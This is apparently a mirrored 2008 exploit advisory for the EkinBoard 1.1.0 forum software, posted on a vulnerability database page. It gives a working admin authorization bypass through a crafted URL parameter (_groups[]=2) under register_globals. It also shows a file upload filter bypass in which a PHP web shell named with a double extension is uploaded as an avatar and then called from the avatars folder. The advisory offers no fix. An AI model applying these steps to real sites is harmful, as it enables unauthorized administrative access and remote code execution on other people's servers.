Lucene search

K

EkinBoard <= 1.1.0 Remote File Upload / Auth Bypass Vulnerabilities

🗓️ 07 Jan 2008 00:00:00Reported by Eugene MinaevType 
zdt
 zdt
🔗 0day.today👁 20 Views

EkinBoard 1.1.0 Remote File Upload / Auth Bypass Vulnerabilitie

Show more
Code
===================================================================
EkinBoard <= 1.1.0 Remote File Upload / Auth Bypass Vulnerabilities
===================================================================



----[ EkinBoard Remote File Upload / Auth Bypass ... ITDefence.ru Antichat.ru ]

							EkinBoard >= 1.1.0 Remote File Upload / Auth Bypass
							
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
			
		We can bypass admin authorization if register_globals on . All admin panel script include this code
		
		<?php
		if(!in_array(2, $_groups)){
		die("<center><span class=red>You need to be an admin to access this page!</span></center>");
		} 
		?>
		
		test1.ru/skvoznoy/backup.php?_groups[]=2
		
		There is a bug in upload function . We can upload any file bypass filters . Name your shell like 
		file.php.gif and select it as your avatar . Then check uploaded/avatars/filename_your_id.php

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]



#  0day.today [2018-03-19]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
07 Jan 2008 00:00Current
7.1High risk
Vulners AI Score7.1
20
.json
Report